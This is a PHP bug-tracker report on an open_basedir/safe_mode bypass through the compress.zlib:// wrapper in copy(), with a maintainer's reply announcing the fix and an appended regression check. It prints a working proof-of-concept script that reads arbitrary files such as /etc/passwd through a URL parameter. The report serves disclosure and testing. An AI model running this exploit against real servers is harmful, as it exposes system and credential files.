Bug #37071 zlib exploit
Submitted: 2006-04-13 13:28 UTC Modified: 2006-04-14 17:50 UTC
Votes:2
Avg. Score:4.5 ± 0.5
Reproduced:2 of 2 (100.0%)
Same Version:2 (100.0%)
Same OS:1 (50.0%)
From: unsecretarygeneral at gmail dot com Assigned:
Status: Closed Package: Safe Mode/open_basedir
PHP Version: 4.4.2 OS: all
Private report: No CVE-ID: None
 [2006-04-13 13:28 UTC] unsecretarygeneral at gmail dot com
Description:
------------
The zlib fopen function does not adhere to safe_mode, or open_base directory, hence an attacker can use zlib to compress 'any' file to a temp folder / world writable folder.

This should be critical, and is NOT fixed in the current CVS.

Reproduce code:
---------------
Example code, called like http://hostname/?file=/etc/passwd

<?php


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file))
{
        if(empty($_GET['file']))
        {
                if(empty($_POST['file']))
                {
                        die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONTCOLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>"
);
                }
                else
                {
                        $file=$_POST['file'];
                }
        }
        else
        {
                $file=$_GET['file'];
        }
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp))
{
        $zrodlo = fopen($temp, "r");
        $tekst = fread($zrodlo, filesize($temp));
        fclose($zrodlo);
        echo "<B>--- Start File ".htmlspecialchars($file)."-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File".htmlspecialchars($file)." ---------------\n";
        unlink($temp);

        die("\n<FONT COLOR=\"RED\"><B>File".htmlspecialchars($file)." has been already loaded. SecurityReason Team;]</B></FONT>");
}
else
{
        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>");
}
?>


Expected result:
----------------
list of /etc/passwd

Actual result:
--------------
list of /etc/passwd

 [2006-04-14 17:50 UTC] pollita@php.net
This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.

The bug isn't in zlib (the inner fopen_wrapper simply passes on the options it's given). The problem is in copy() (which passes the wrong options).

5.1 already had the correct flags, but not other branches; I've applied a fix everywhere else.
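
A regression check for the fix described in the comment above, as an added example that is not part of the original report or of PHP's own test suite: it confirms that copy() from a compress.zlib:// source is refused under open_basedir in the same way as a direct fopen(). The function name, directory layout and file names are constructed for the check, and it assumes a PHP 7 or later CLI with the zlib extension loaded.

```php
<?php
// Added example: regression check for the behaviour reported in this bug.
// All paths and names below are constructed for the check.

function check_zlib_copy_respects_open_basedir(): array
{
    if (!in_array('compress.zlib', stream_get_wrappers(), true)) {
        throw new RuntimeException('zlib stream wrapper not available');
    }

    // Constructed layout: <tmp>/bug37071_<id>/{inside,outside}
    $root    = realpath(sys_get_temp_dir()) . DIRECTORY_SEPARATOR . uniqid('bug37071_', true);
    $inside  = $root . DIRECTORY_SEPARATOR . 'inside';
    $outside = $root . DIRECTORY_SEPARATOR . 'outside';
    mkdir($inside, 0700, true);
    mkdir($outside, 0700, true);

    // A file that must stay unreadable once open_basedir is restricted.
    $secret = $outside . DIRECTORY_SEPARATOR . 'secret.txt';
    file_put_contents($secret, "constructed marker\n");
    $dest = $inside . DIRECTORY_SEPARATOR . 'copy.out';

    // Tighten open_basedir at runtime. It cannot be loosened again in this
    // process, so the constructed files are left behind in the temp dir.
    if (ini_set('open_basedir', $inside . DIRECTORY_SEPARATOR) === false) {
        throw new RuntimeException('could not set open_basedir');
    }

    $results = [
        // Baseline: a plain path outside the base directory is refused.
        'plain copy blocked' => !@copy($secret, $dest),
        // The wrapper itself honours the restriction when opened directly.
        'zlib fopen blocked' => @fopen('compress.zlib://' . $secret, 'r') === false,
        // The case from this report: copy() with a wrapped source path.
        'zlib copy blocked'  => !@copy('compress.zlib://' . $secret, $dest),
    ];

    // No data may have reached the destination inside the base directory.
    clearstatcache();
    $results['nothing written'] = !file_exists($dest) || filesize($dest) === 0;
    return $results;
}

$results = check_zlib_copy_respects_open_basedir();
foreach ($results as $name => $ok) {
    echo ($ok ? 'PASS' : 'FAIL'), "  $name\n";
}
exit(in_array(false, $results, true) ? 1 : 0);
```

A non-zero exit status with only "zlib copy blocked" failing matches the behaviour described in this report.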